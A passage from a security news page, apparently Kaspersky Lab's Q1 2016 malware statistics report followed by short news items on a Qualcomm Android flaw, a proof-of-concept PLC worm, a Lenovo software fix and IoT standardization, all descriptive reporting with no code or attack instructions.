* We excluded those countries in which the number of Kaspersky Lab product users is relatively small (less than 10,000).
** Unique users whose computers have been targeted by Trojan-Ransom encryptor malware as a percentage of all unique users of Kaspersky Lab products in the country.
In Q1, the first six places in the Top 10 were occupied by European countries. Italy (3.06%) topped the rating; the most widespread encryptor family in this country was Teslacrypt (Trojan-Ransom.Win32.Bitman). Italy was followed by the Netherlands (1.81%) and Belgium (1.58%).
Top 10 most widespread encryptor families
Name Verdict* Percentage of users**
1 Teslacrypt Trojan-Ransom.Win32.Bitman/Trojan-Ransom.JS.Cryptoload 58.43%
2 CTB-Locker Trojan-Ransom.Win32.Onion/Trojan-Ransom.NSIS.Onion 23.49%
3 Cryptowall / Cryptodef Trojan-Ransom.Win32.Cryptodef 3.41%
4 Cryakl Trojan-Ransom.Win32.Cryakl 3.22%
5 Scatter Trojan-Ransom.BAT.Scatter/Trojan-Downloader.JS.Scatter/Trojan-Dropper.JS.Scatter/Trojan-Ransom.Win32.Scatter 2.47%
6 Rakhni Trojan-Ransom.Win32.Rakhni/Trojan-Downloader.Win32.Rakhni 1.86%
7 Locky Trojan-Ransom.Win32.Locky 1.30%
8 Shade Trojan-Ransom.Win32.Shade 1.21%
9 iTorLock / Troli Trojan-Ransom.MSIL.Lortok 0.84%
10 Mor / Gulcrypt Trojan-Ransom.Win32.Mor 0.78%
* These statistics are based on detection verdicts received from users of Kaspersky Lab products who have consented to provide their statistical data.
** Unique users whose computers have been targeted by a specific Trojan-Ransom family as a percentage of all users of Kaspersky Lab products attacked by Trojan-Ransom malware.
First place in Q1 was occupied by the Teslacrypt family represented by two verdicts: Trojan-Ransom.Win32.Bitman and Trojan-Ransom.JS.Cryptoload. The second verdict is typical for scripts that are sent out in ZIP archives as part of spam mailings. In the past, these scripts downloaded malware such as Fareit and Cryptowall, but recently the attackers have switched to TeslaCrypt. Noticeably, in Q1 new versions of this encryptor with an improved encryption algorithm were spread this way: the authors used the “reliable” RSA-4096 instead of AES.
In Q1 2016, @kaspersky #web antivirus detected 18,610,281 unique malicious objects #KLreport
Second came the CTB-Locker (Trojan-Ransom.Win32 / NSIS.Onion) family. The members of this family are usually distributed via an affiliate program, and are supported in many languages. As mentioned above, in the first quarter of 2016, a new variant of the CTB-Locker that targets web servers only was discovered. It has already successfully encrypted web-root files in more than 70 servers located in 10 countries.
The Trojan-Ransom.Win32.Cryptodef family also known as Cryptowall came third. Its representatives, as in the case of Teslacrypt, are spread via spam mass mailings.
In fifth place is the Scatter family. Earlier this year, a new wave of proliferation involving this encryptor via spam mailings was registered. The emails contained a link to a JS script that was masked in order to make the user download and launch it locally. Interestingly, when the script runs, in addition to Scatter, it saves two other malicious programs to the disk: Nitol (DDoS-bot) and Pony (a Trojan designed to steal information, mostly passwords).
The Locky family, which occupied seventh place in the Q1 rating, was notable for its wide geographic spread, mainly across Europe. Located on the Tor network, the site containing the criminals’ demands supports more than two dozen languages, which doesn’t include Russian or other CIS languages. This may mean that cybercriminals are not interested in attacking victims in these countries, something that is confirmed by the KSN statistics.
Statistics
All the statistics used in this report were obtained using Kaspersky Security Network (KSN), a distributed antivirus network that works with various anti-malware protection components. The data was collected from KSN users who agreed to provide it. Millions of Kaspersky Lab product users from 213 countries and territories worldwide participate in this global exchange of information about malicious activity.
Mobile threats
Cybercriminals continue to improve new techniques for deceiving users. This quarter, we identified two mobile Trojans that counter standard security mechanisms used by operating systems. One version of Trojan-Banker.AndroidOS.Asacub overlays the regular system window requesting device administrator privileges with its own window containing buttons. The Trojan thereby conceals the fact that it is gaining elevated privileges in the system from the user, and tricks the user into approving these privileges. Another Trojan using a similar method is Trojan-SMS.AndroidOS.Tiny.aw. In recent versions of Android the system asks for the user’s approval when an SMS is sent to a premium number. The Tiny SMS Trojan overlays this dialog with its own screen without covering the buttons in the original window.
Request screen of Trojan-SMS.AndroidOS.Tiny.aw overlaying a notification about the sending of an SMS to a premium-rate number (The message states: Would you like to send a request to receive a gaming database?)
The Trojan’s request is presented in such a way that the user will most probably agree to send the SMS to a premium-rate number without having the vaguest idea of what happened next.
In the Q3 2015 report we mentioned the banking Trojan Trojan-Banker.AndroidOS.Marcher. This quarter, we were able to detect new versions of Marcher which attacked nearly 40 banking apps, mostly belonging to European banks. Unlike most other mobile Trojans, Marcher uses phishing web pages rather than its own windows to overlay banking app screens.
In Q1, we saw an increase in activity by the mobile ransomware Trojan-Ransom.AndroidOS.Fusob.pac, which blocks the user’s device and demands a ransom for decryption. In the first three months of 2016, Fusob became the most popular mobile Trojan of this type – it accounted for over 64% of users attacked by mobile ransomware. The total number of users attacked by mobile ransomware Trojans increased more than 1.8 times compared to the previous quarter.
The number of new mobile threats
In Q1 2016, Kaspersky Lab detected 2,045,323 malicious installation packages – this is 11 times greater than in Q4 2015, and 1.2 times more than in Q3 2015.
Number of detected malicious installation packages (Q2 2015 – Q1 2016)
Distribution of mobile malware by type
Distribution of new mobile malware by type, Q1 2016 vs. Q4 2015
In Q1 2016, adware programs continued to top the rating of detected malicious objects for mobile devices. The share of adware programs grew 13 p.p. compared to Q4 2015, and reached 42.7%. Notably, this is lower than in Q3 2015 (52.5%).
Second place is occupied by an SMS Trojan, and it is the second quarter in a row that we have seen a growth in the share of detections of this type of object. In Q4 2015, the share of SMS Trojans rose dramatically from 6.2% to 19.8%, and grew by another 0.7 p.p. in Q1 2016, and amounted to 20.5%.
Trojan spyware programs, with a 10% share, were right behind the SMS Trojans. These programs steal the user’s personal data, including incoming messages (mTANs) from banks.
RiskTool software, or legal applications that are potentially dangerous to users, had occupied the first or second position in this rating for nearly two years. However, starting in Q4 2015 they fell to the fifth place. In Q4 2014, there share was 5.6%, and in Q1 2016 7.4%.
The share of banking Trojans has continued to grow, and amounted to 1.2% in Q1 2016.
TOP 20 mobile malware programs
Please note that this ranking of malicious programs does not include potentially dangerous or unwanted programs such as RiskTool or adware.
Name % of attacked users*
1 DangerousObject.Multi.Generic 73.7
2 Backdoor.AndroidOS.Ztorg.c 11.3
3 Trojan.AndroidOS.Iop.c 8.9
4 Trojan.AndroidOS.Ztorg.a 8.7
5 Trojan-Ransom.AndroidOS.Fusob.pac 6.2
6 Trojan-Dropper.AndroidOS.Agent.ar 4.6
7 Trojan-Clicker.AndroidOS.Gopl.a 4.5
8 Backdoor.AndroidOS.Ztorg.b 4.3
9 Trojan.AndroidOS.Iop.m 3.7
10 Trojan.AndroidOS.Agent.ej 3.7
11 Trojan.AndroidOS.Iop.q 3.5
12 Trojan.AndroidOS.Ztorg.i 3.3
13 Trojan.AndroidOS.Muetan.b 3.1
14 Trojan.AndroidOS.Agent.gm 3.1
15 Trojan-SMS.AndroidOS.Podec.a 3.1
16 Trojan-Downloader.AndroidOS.Leech.a 3.0
17 Trojan-Dropper.AndroidOS.Guerrilla.b 2.8
18 Exploit.AndroidOS.Lotoor.be 2.8
19 Backdoor.AndroidOS.Ztorg.a 2.8
20 Backdoor.AndroidOS.Triada.d 2.4
* Percentage of users attacked by the malware in question, relative to all users attacked
First place is occupied by DangerousObject.Multi.Generic (44.2%), used for malicious programs detected by cloud technologies. Cloud technologies work when the antivirus database contains neither the signatures nor heuristics to detect a malicious program, but the cloud of the antivirus company already contains information about the object. This is basically how the very latest malware is detected.
An increasing number of entries in the TOP 20 are occupied by Trojans that use advertising as their main means of monetization. Their goal is to deliver as much advertisements as possible to the user, employing various methods, including the installation of new adware. These Trojans may use superuser privileges to conceal themselves in the system application folder, from which it will be very difficult to delete them. In Q1, 16 such programs made it into the TOP 20: three programs from the family Backdoor.AndroidOS.Ztorg, three from the family Trojan.AndroidOS.Iop, two from the family Trojan.AndroidOS.Ztorg, plus Trojan-Dropper.AndroidOS.Agent.ar, Trojan-Clicker.AndroidOS.Gopl.a, Trojan.AndroidOS.Agent.ej, Trojan.AndroidOS.Muetan.b, Trojan.AndroidOS.Agent.gm, Trojan-Downloader.AndroidOS.Leech.a, Trojan-Dropper.AndroidOS.Guerrilla.b, and Backdoor.AndroidOS.Triada.d.
Backdoor.AndroidOS.Triada is a new entry in the TOP 20 of mobile malware. The main function of this Trojan is to redirect financial SMS transactions when the user makes online payments to buy additional content in legitimate apps. The money goes to the attackers rather than to the software developer. Triada is the most complex mobile malware program that we know of. Its distinctive feature is the use of the Zygote process to implement its code in the context of all the applications on the device. Triada penetrates virtually all applications running on the infected device, and continues to exist in the RAM memory only. In addition, all the Trojan’s separately launched processes are concealed from the user and other applications.
The ransomware Trojan Trojan-Ransom.AndroidOS.Fusob.pac is in fifth place (6.2%). This Trojan demands a $200 ransom from victims to unblock their devices. A substantial number of the victims are located in North America (the US and Canada) and Europe (mostly in Germany, Italy, the UK, Spain and Switzerland).
Trojan-SMS.AndroidOS.Podec.a (3%) has spent over a year now in the mobile malware TOP 20, although now it is beginning to lose ground. Earlier it was consistently among the top 5 mobile threats, but in Q1 2016 it only made it into the bottom half of the rating. The number of users attacked by this Trojan fell 1.7 times compared to Q4 2015. Its functionality has remained practically unchanged; the main means of monetization is still achieved by subscribing the user to paid services.
Also making it into the rating is Exploit.AndroidOS.Lotoor.be, an exploit used to gain local super-user rights.
The geography of mobile threats
The geography of mobile malware infection attempts in Q1 2016 (percentage of all users attacked)
Top 10 counties attacked by mobile malware (ranked by percentage of users attacked)
Country* % of users attacked**
1 China 38.2
2 Bangladesh 27.6
3 Uzbekistan 21.3
4 Algeria 17.6
5 Nigeria 17,4
6 India 17.0
7 Philippines 15.7
8 Indonesia 15,6
9 Ukraine 15.0
10 Malaysia 14.0
* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000.
** Percentage of unique users attacked in each country relative to all users of Kaspersky Lab’s mobile security product in the country.
China topped the ranking, with 40% of users encountering a mobile threat at least once during the year. To recap, in 2015 China also came first in the ranting.
In all the countries of the Top 10 except for China the most popular mobile malware was the same – advertising Trojans that appeared in the TOP 20 mobile malware, and AdWare. In China, a significant proportion of attacks also involved advertising Trojans, but the majority of users encountered the Backdoor.AndroidOS.GinMaster and Backdoor.AndroidOS.Fakengry families. Representatives of the RiskTool.AndroidOS.SMSreg family were also popular. If used carelessly, these programs could result in money being withdrawn from a mobile account.
The safest countries are Taiwan (2.9%), Australia (2.7%) and Japan (0.9%).
Mobile banking Trojans
Over the reporting period, we detected 4,146 mobile Trojans, which is 1.7 times more than in the previous quarter.
Number of mobile banking Trojans detected by Kaspersky Lab solutions (Q2 2015 – Q1 2016)
Geography of mobile banking threats in Q1 2016 (number of users attacked)
The number of attacked users depends on the overall number of users within each individual country. To assess the risk of a mobile banker Trojan infection in each country, and to compare it across countries, we created a country ranking according to the percentage of users attacked by mobile banker Trojans.
Top 10 counties attacked by mobile banker Trojans (ranked by percentage of users attacked)
Country* % users attacked**
1 China 0.45
2 Australia 0.30
3 Russia 0.24
4 Uzbekistan 0.20
5 Ukraine 0.08
6 France 0.06
7 Byelorussia 0.05
8 Turkey 0.05
9 Japan 0.03
10 Kazakhstan 0.03
* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000.
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users of Kaspersky Lab’s mobile security product in the country.
In Q1 2016, first place was occupied by China where the majority of affected users encountered the Backdoor.AndroidOS.GinMaster and Backdoor.AndroidOS.Fakengry families of mobile banker Trojans. In second place was Australia where the Trojan-Banker.AndroidOS.Acecard family was replaced by the Trojan-Banker.AndroidOS.Marcher family as the most popular threat.
TOP 10 countries by the percentage of users attacked by mobile banking Trojans relative to all attacked users
An indication of how popular mobile banker Trojans are with cybercriminals in each country can be provided by the percentage of users who were attacked at least once by mobile banker Trojans during the quarter, relative to all users in the same country whose mobile security product was activated at least once in the reporting period. This ranking differs from the one above:
Country* % users attacked**
1 Australia 13.4
2 Russia 5.1
3 United Kingdom 1.6
4 Turkey 1.4
5 Austria 1.3
6 France 1.3
7 Poland 1.2
8 China 1.1
9 Hong Kong 1
10 Switzerland 0.9
* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000.
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all unique users attacked by mobile malware in the country.
To recap, Australia was among the Top 3 countries with the lowest percentage of users attacked by mobile malware. However, in this ranking Australia ended in first place: more than 13% of all users attacked by mobile malicious programs were attacked by mobile bankers. Meanwhile China, which came first in the previous ranking, ended the quarter in tenth place. In other words, in China the cybercriminals’ mobile banking Trojans are less popular than other types of mobile malware.
Mobile Trojan-Ransom
In Q1 2016, we detected 2,896 mobile ransomware samples, which is 1.4 times more than in the previous quarter.
>Number of mobile Trojan-Ransomware programs detected by Kaspersky Lab (Q2 2015 – Q1 2016)
TOP 10 countries attacked by Trojan-Ransomware as a percentage of attacked users:
Country* % of users attacked **
1 Kazakhstan 0.92
2 Germany 0.83
3 Uzbekistan 0.80
4 Canada 0.71
5 Italy 0.67
6 Netherlands 0.66
7 United Kingdom 0.59
8 Switzerland 0.58
9 USA 0.55
10 Spain 0.36
* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000.
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users attacked by mobile malware in the country.
In all the countries of the TOP 10, except for Kazakhstan and Uzbekistan, the most popular Trojan-Ransom family was Fusob, especially its Trojan-Ransom.AndroidOS.Fusob.pac modification (note, this malicious program was fifth in the ranking of mobile threats).
In Kazakhstan and Uzbekistan, which came first and third respectively, the main threat to users originated from representatives of the Small family of mobile Trojan-Ransom. This is a fairly simple ransomware program that blocks operation of a device by overlaying all the windows on the device with its own window and demands $10 to unblock it.
Vulnerable applications used by cybercriminals
In Q1 2016, exploits for Adobe Flash Player remained popular. During the reporting period two new vulnerabilities in this software were detected:
CVE-2015-8651
CVE-2016-1001
The first exploit pack to add support for these vulnerabilities was Angler.
One notable event in the first quarter was the use of an exploit for Silverlight – CVE-2016-0034. At the time of publication, this vulnerability is used by the Angler and RIG exploit packs.
As is now traditional, some popular packs included an exploit for the Internet Explorer (CVE-2015-2419) vulnerability.
The overall picture of the use of exploits in the first quarter looks as follows:
Distribution of exploits used in attacks by the type of application attacked, Q1 2016
As expected, we have seen a decline in the share of exploits for Java (-3 percentage points) and an increase in the use of Flash exploits (+1 p.p.). There was also a significant increase in the percentage of exploits for Microsoft Office (+10 p.p.): this group mainly includes exploits for vulnerabilities in Microsoft Word. This significant growth was caused by spam mailings containing these exploits.
In Q1 2016, @kaspersky blocked #crypto #ransomware attacks on 372,602 computers of unique users #KLreport
Overall, the first quarter of 2016 continued the trend of the past few years – cybercriminals are focused on exploits for Adobe Flash Player and Internet Explorer. In our chart, the latter is included in the “Browsers” category together with detections of landing pages that “distribute” exploits.
Online threats (Web-based attacks)
The statistics in this section were derived from web antivirus components that protect users from attempts to download malicious objects from a malicious/infected website. Malicious websites are created deliberately by malicious users; infected sites include those with user-contributed content (such as forums), as well as compromised legitimate resources.
In the first quarter of 2016, Kaspersky Lab’s web antivirus detected 18,610,281 unique malicious objects: scripts, exploits, executable files, etc. 74,001,808 unique URLs were recognized as malicious by web antivirus components.
Online threats in the banking sector
In the first three months of 2016, Kaspersky Lab solutions blocked attempts to launch malware capable of stealing money via online banking on 459,970 computers. We are witnessing a decline in financial malware activity: the figure for Q1 is 23.3% lower than in the previous quarter (597,415). A year ago, in Q1 2015 this figure was 699,652, which translates into a 34.26% fall in the number of victims over the past year.
Number of attacks by financial users, Q1 2016
Geography of attacks
To evaluate and compare the degree of risk of being infected by banking Trojans worldwide, we calculate the percentage of Kaspersky Lab product users who encountered this type of threat during the reporting period in the country, relative to all users of our products in the county.
Geography of banking malware attacks in Q1 2016 (percentage of attacked users)
Top 10 countries by the percentage of attacked users
Country* % attacked users**
1 Brazil 3.86
2 Austria 2.09
3 Tunisia 1.86
4 Singapore 1.83
5 Russia 1.58
6 Venezuela 1.58
7 Morocco 1.43
8 Bulgaria 1.39
9 Hong Kong 1.37
10 United Arab emirates 1.30
These statistics are based on the detection verdicts returned by the antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.
* We excluded those countries in which the number of Kaspersky Lab product users is relatively small (less than 10,000).
** Unique users whose computers have been targeted by banking Trojan attacks as a percentage of all unique users of Kaspersky Lab products in the country.
In Q1 2016, Brazil had the highest percentage of Kaspersky Lab users who were attacked by banking Trojans. One of the reasons for the growth of financial threats in this country was the emergence of cross-platform Trojan bankers. Noticeably, most countries in the TOP 10 have a high level of technological development and/or well-developed banking system which attracts cybercriminals.
In Russia, 1.58% of users encountered a banking Trojan at least once in Q1 (an increase of 1 p.p. compared to the previous quarter). In the US, the figure was 0.26%; Spain – 0.84%; Italy – 0.79%; Germany – 0.52%; the UK – 0.48%; France – 0.36%.
The Top 10 banking malware families
The table below shows the Top 10 malware families most commonly used in Q1 2016 to attack online banking users:
Name Number of users attacked
1 Trojan-Spy.Win32.Zbot 419940
2 Trojan-Downloader.Win32.Upatre 177665
3 Trojan-Banker.Java.Agent 68467
4 Trojan-Banker.Win32.Gozi 53978
5 Trojan-Banker.Win32.BestaFera 25923
6 Trojan.Win32.Tinba 24964
7 Trojan-Banker.Win32.Banbra 22942
8 Trojan-Banker.AndroidOS.Agent 19782
9 Trojan-Banker.AndroidOS.Abacus 13446
10 Trojan-Banker.Win32.ChePro 9209
Trojan-Spy.Win32.Zbot topped the ranking. It has become a permanent resident in this ranking, and it is no coincidence that it consistently occupies a leading position. The Trojans of the Zbot family were among the first to use web injections to compromise the payment details of online banking users and to modify the contents of banking web pages. They encrypt their configuration files at several levels; the decrypted configuration file is never stored in the memory in its entirety, but is instead loaded in parts.
The Trojan-Downloader.Win32.Upatre family of malicious programs came second in Q1 2016. The malware is no larger than 3.5 KB in size, and is limited to downloading the payload to the victim computer, most typically a banker Trojan from the Dyre/Dyzap/Dyreza family. The main aim of this family of banking Trojans is to steal the user’s payment details. Dyre does this by intercepting the data from a banking session between the victim’s browser and the online banking web app, in other words, it uses the “Man-in-the-Browser” (MITB) technique.
It is worth noting that the vast majority of the TOP 10 malware uses the technique of embedding arbitrary HTML code in the web page displayed by the browser and intercepting payment data entered by the user into the original and the inserted web forms.
The TOP 3 threats in the first quarter of 2016 include cross-platform banking malware written in Java. Brazilian cybercriminals have started actively using cross-platform Java Trojans. In addition, Kaspersky Lab experts detected new malicious software also written in Java and used to steal financial information – Adwind RAT. Adwind is written entirely in Java, which is why it can attack all popular platforms: Windows, Mac OS, Linux and Android. The malicious program allows attackers to collect and extract data from the system, as well as remotely control an infected device. To date, it is able to take screenshots, memorize keystrokes, steal passwords and data stored in browsers and web forms, take photos and videos via the webcam, make audio recordings using the microphone built into the device, collect general data about the user and the system, steal VPN certificates and keys from crypto currency wallets and, finally, manage SMS.
In Q1 2016, @kaspersky #mobile products detected 2M malicious installation packages #KLreport
Fourth place in the TOP 10 is occupied by Trojan-Banker.Win32.Gozi, which penetrates working processes of popular web browsers to steal payment information. Some samples of this Trojan can infect the MBR (Master Boot Record) and maintain their presence in the operating system, even if it has been reinstalled.
One of the most interesting pieces of malware designed to steal financial data that did not make it into the TOP 10 is Gootkit. It is written using the software platform NodeJS and has a modular architecture. The malicious code interpreter is contained in its body; as a result, it is big – approximately 5 MB. To steal payment data, Gootkit uses http traffic interception and embeds itself in the browser. Other standard Trojan features include execution of arbitrary commands, auto-update, and capturing screenshots. However, this banking Trojan is not particularly widespread.
Top 10 countries where online resources are seeded with malware
The following statistics are based on the physical location of the online resources that were used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks.
In order to determine the geographical source of web-based attacks, domain names are matched up against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.
In Q1 2016, Kaspersky Lab solutions blocked 228,420,754 attacks launched from web resources located in 195 countries around the world. 76% of notifications on blocked web attacks were triggered by attacks coming from web resources located in 10 countries.
Distribution of web attack sources by country, Q1 2016
Q1 saw the Netherlands take over first place (24.6%) from the US (21.44%). Russia (7.45%) and Germany (6%), which followed them, also swapped places. Vietnam has dropped out the Top 10, while Bulgaria is a newcomer in eighth place with 1.75%.
Countries where users faced the greatest risk of online infection
In order to assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users in each country who encountered detection verdicts on their machines during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers work in different countries.
Country* % of unique users attacked **
1 Russia 36.28
2 Kazakhstan 33.19
3 China 32.87
4 Azerbaijan 30.28
5 Ukraine 29.96
6 Belarus 29.16
7 Slovenia 26.88
8 Armenia 26.27
9 Vietnam 25.14
10 Moldova 24.68
11 Kyrgyzstan 24.46
12 Spain 24.00
13 India 23.98
14 Brazil 23.68
15 Italy 22.98
16 Algeria 22.88
17 Lithuania 22.58
18 Croatia 22.04
19 Turkey 21.46
20 France 21.46
These statistics are based on the detection verdicts returned by the web antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.
* These calculations excluded countries where the number of Kaspersky Lab users is relatively small (fewer than 10,000 users).
** Unique users whose computers have been targeted by web attacks as a percentage of all unique users of Kaspersky Lab products in the country.
The leader of this ranking remained unchanged – it is still Russia with 36.3%. Since the previous quarter, Chile, Mongolia, Bulgaria and Nepal have left the Top 20. Newcomers to the ranking are Slovenia (26.9%), India (24%) and Italy (23%).
The countries with the safest online surfing environments included Germany (17.7%), Canada (16.2%), Belgium (14.5%), Switzerland (14%), the US (12.8%), the UK (12.7%), Singapore (11.9%), Norway (11.3%), Honduras (10.7%), the Netherlands (9.6%) and Cuba (4.5%).
On average, 21.42% of computers connected to the Internet globally were subjected to at least one web attack during the three months. This is a fall of 1.5 p.p. compared to Q4 2015.
Local threats
Local infection statistics for users computers are a very important indicator: they reflect threats that have penetrated computer systems using means other than the Internet, email, or network ports.
Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media.
In Q1 2016, Kaspersky Lab’s file antivirus detected a total of 174,547,611 unique malicious and potentially unwanted objects.
Countries where users faced the highest risk of local infection
For each of the countries, we calculated the percentage of Kaspersky Lab product users on whose computers the file antivirus had been triggered during the quarter. These statistics reflect the level of personal computer infection in different countries.
Top 20 countries with the highest levels of computer infection
Country* % of unique users**
1 Somalia 66.88%
2 Yemen 66.82%
3 Armenia 65.17%
4 Kyrgyzstan 64.45%
5 Russia 64.18%
6 Tajikistan 64.06%
7 Bangladesh 63.00%
8 Vietnam 61.31%
9 Afghanistan 60.72%
10 Kazakhstan 60.62%
11 Nepal 59.60%
12 Uzbekistan 59.42%
13 Ethiopia 59.23%
14 Ukraine 58.90%
15 Byelorussia 58.51%
16 Laos 58.46%
17 Rwanda 58.10%
18 Iraq 57.16%
19 Algeria 57.50%
20 Moldova 56.93%
These statistics are based on the detection verdicts returned by on-access and on-demand antivirus modules, received from users of Kaspersky Lab products who have consented to provide their statistical data. The data include detections of malicious programs located on users’ computers or on removable media connected to the computers, such as flash drives, camera and phone memory cards, or external hard drives.
* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (fewer than 10,000 users).
** The percentage of unique users in the country with computers that blocked local threats as a percentage of all unique users of Kaspersky Lab products.
In Q1 2016, @kaspersky #mobile products detected 2,896 mobile #ransomware Trojans #KLreport
Somalia became the new leader of this rating in Q1, with 66.9%. Bangladesh, the leader for the past few quarters, dropped to seventh place (63.6%). Newcomers to this ranking are Uzbekistan in 12th place (59.4%), Ukraine in 14th place (58.9%), Belarus in 15th place (58.5%), Iraq in 18th place (57.2%) and Moldova in 20th (57.0%).
The safest countries in terms of local infection risks were the Czech Republic (27.2%), Denmark (23.2%) and Japan (21.0%).
An average of 44.5% of computers globally faced at least one local threat during Q1 2016, which is 0.8 p.p. more than in Q4 2015.
Critical Qualcomm flaw puts millions of Android devices at risk
7.5.2016 Vulnerebility
Google has patched a high-severity vulnerability that has been around for the last five years, potentially leaving users' text messages, call histories, and other sensitive data open to snooping.
The vulnerability, CVE-2016-2060, affects Android versions 4.3 and earlier that use the software package maintained by mobile chipmaker Qualcomm, according to a blog post published by security firm FireEye.
The issue was first introduced in 2011 when Qualcomm released a set of new APIs (Application Programming Interfaces) for a network manager system service to the Android Open Source Project (AOSP) and later the "netd" daemon.
Qualcomm modified the netd daemon for providing additional networking capabilities to your smartphone, including additional tethering capabilities, among other things.
But unfortunately, the modification introduced a critical bug to the Android operating system that could allow low-privileged apps to gain access to your private data that is supposed to be off-limits.
According to researchers, attackers can exploit the vulnerability either by gaining physical access to your unlocked smartphone or by forcing you to install a malicious application onto your smartphone, likely through phishing campaign or a malicious app that has made its way to the Google Play Store.
The flaw likely affects hundreds of Android models manufactured in the last five years using Qualcomm chips.
"This vulnerability allows a seemingly benign application to access sensitive user data including SMS and call history and the ability to perform potentially sensitive actions such as changing system settings or disabling the lock screen," FireEye researchers wrote.
Researchers said the vulnerability is most severe on devices running Android 4.3 Jelly Bean, and earlier, that are "likely to remain unpatched." The issue has also been confirmed on devices running Android 5.0 Lollipop and Android 4.4 KitKat.
However, newer devices running Android with SEAndroid, the Android’s implementation of Security Enhanced Linux, are less affected, but a malicious application could still modify some system properties managed by the operating system.
The vulnerability was patched in the latest Android security patch update Google released on May 1. According to the tech giant, Nexus devices were never affected by the flaw.
Is the Armageddon a PLC-Based Worm?
7.5.2016 Virus
Three German security researchers have presented a PLC-based worm with Proof-of-Concept based on the Siemens SIMATIC S7-1200 PLC.
Three German security researchers have presented a PLC-based worm at Black Hat Asia. The proof of concept is based on the Siemens SIMATIC S7-1200 PLC which reminds us all two well of an earlier PLC attacking worm known as STUXNET.
STUXNET targeted Siemens SIMATIC S7-300 PLCs located in nuclear facilities in Iran. However, the main difference is that all of the worms targeting PLCs so far “lived” and spread in computers and only attacked PLCs. This new proof of concept worm, however, lives in, spreads over and attacks PLCs.
The worm was designed and developed specially for the PLC environment, which resulted in a custom and optimized PLC worm. The worm takes into account computing limits of PLCs and uses the limited resources accordingly.
The spreading mechanism avoided the historical mistake made by the Morris worm in the 80s by first checking if the target PLC has already been infected. As you’ll remember the Morris worm caused computers to crash because it didn’t check whether or not the target was already infected. Multiple infections then caused the target to lose all its resources and crash. The same problem could occur even more easily in systems that have more limited resources, such as PLCs, and apparently the researchers wanted to avoid this. If no signs of previous infection are detected the worm will copy itself to the target and start looking for new targets.
The worm replicates itself on the target PLC using ports and protocols used by Siemens SIMATIC PLCs.
Security researchers Ralf Spenneberg, Maik Brüggemann and Hendrik Schwartke who presented the proof of concept also added some features that simulate typical worm behavior. The worm connects to a command & control server using TCP. The worm also supports a basic proxy function that allows it to link the command & control server to any potential other targets within the infected network.
The worm can also start an endless loop which will eventually cause the PLC to crash in a denial of service (DoS) attack which in real life would cause whatever service or infrastructure (electricity, water, nuclear power plant, etc.) managed by the PLC to stop. Finally, the worm can also manipulate the outputs of the PLC which allows it to modify any value of the PLC process.
The fact that the worm spreads using PLCs makes it invisible to any host-based security solutions such as antivirus and host based IPS. This proof of concept worm requires the target PLC to stop for about 10 seconds during the initial infection phase, monitoring the PLC for such short interruptions could be a way to detect a potential infection. Monitoring the network traffic for ICS (Industrial Control System) specific traffic and connections could also be an effective way to detect an infection spreading on the network.
Lenovo fixes serious flaw in pre-installed Lenovo Solution Center
7.5.2016 Vulnerebility
Lenovo fixed the Lenovo Solution Center, once again the company faces problems with pre-installed bloatware causing major security problems for users.
Lenovo has fixed a security vulnerability in the Lenovo Solution Center (LSC) support tool that could be exploited by attackers to execute code with system privileges and take over the machine.
Lenovo Solution Center (LSC) software is pre-installed by Lenovo on many laptops and desktops, it is used by users to check their system information, manage updates and backups, check battery status, manage registration info and perform hardware tests.
The Lenovo Solution Center application is composed of two main components, the UI and the LSCTaskService service that always runs in the background.
The company released on April 25 the Lenovo Solution Center version 3.3.002 that includes a fix for a local privilege escalation vulnerability reported by Trustwave. The flaw could be exploited by a local Windows user to run malicious code with system privileges and take over the computer.
“Vulnerabilities were identified within LSC’s backend service process that may allow a local user to execute arbitrary code with SYSTEM level privileges. In addition, a cross-site request forgery (CSRF) vulnerability exists that may allow exploitation of these vulnerabilities if a user opens a malicious web site or crafted URL while the LSC backend service is running on a user’s machine. The user’s computer may still be vulnerable even if the LSC user interface is not running.” reads the advisory from Lenovo”
This incident is the last in order of time that is related to flaw affecting software pre-installed by manufacturers on their PCs. In December, another flaw was discovered in the Lenovo LSC application.
It is important to note that in order to apply the fix users should download the latest version manually from the company website.
Chaos Theory of Standardization in IOT
7.5.2016 Security
There are numerous standards being followed currently in the IOT space to connect various devices but no single global framework is followed.
As Chaos theory focuses on the initial condition of every event meaning that their future behavior is fully determined by their initial conditions, I feel that the IOT scenario is also currently at an initial juncture where we have an opportunity to control the situation before it goes out of hand. There are numerous standards being followed currently in the IOT space to connect various devices but no single global framework is followed.
Like the TCP for internet or the IPV4/6 for connectivity which has become the global standard. We have seen the telecommunication and internet revolution simultaneously happening which has fueled various innovations and has made life much more convenient. Even though 2G, 3G, 4G, 5G technologies along with Internet have been globally standardized, the IOT which uses internet as a platform has not yet been standardized. The objective of IOT standardization is to create one language for IOT communication. Even though historically many technological standards have been standardized to a global standard, the IOT world is in a state of chaos and is actually diverging into many individual standard formats than converging into one. Think of the data that were recorded in the cassette tapes and VCR system. Their formats are not compatible in today’s data format and hence obsolete. This will “distinguish past from the future, by marching away from the chaos, the randomness, and moving towards stability. This is why standards are necessary”. (Campbell, J., 1983. Grammatical Man, A Touchstone Book, Simon & Schuster, Inc., page 265.)
The way hierarchy structure in an organization reduces the data analytics time as only the managers data have to be analyzed as each manager manages few associates. Therefore less data analysis saves time and hence cost. Most economics theory is based on saving time. Most of the ecommerce startup like online grocery (Food tech startup) or cab aggregators like Uber focus on saving time using mobile apps hence save effort and cost.
Standardization will in turn save enormous amount of time and cost. One of the major changes in this space has been triggered due to the declining cost of sensors and cloud storage.
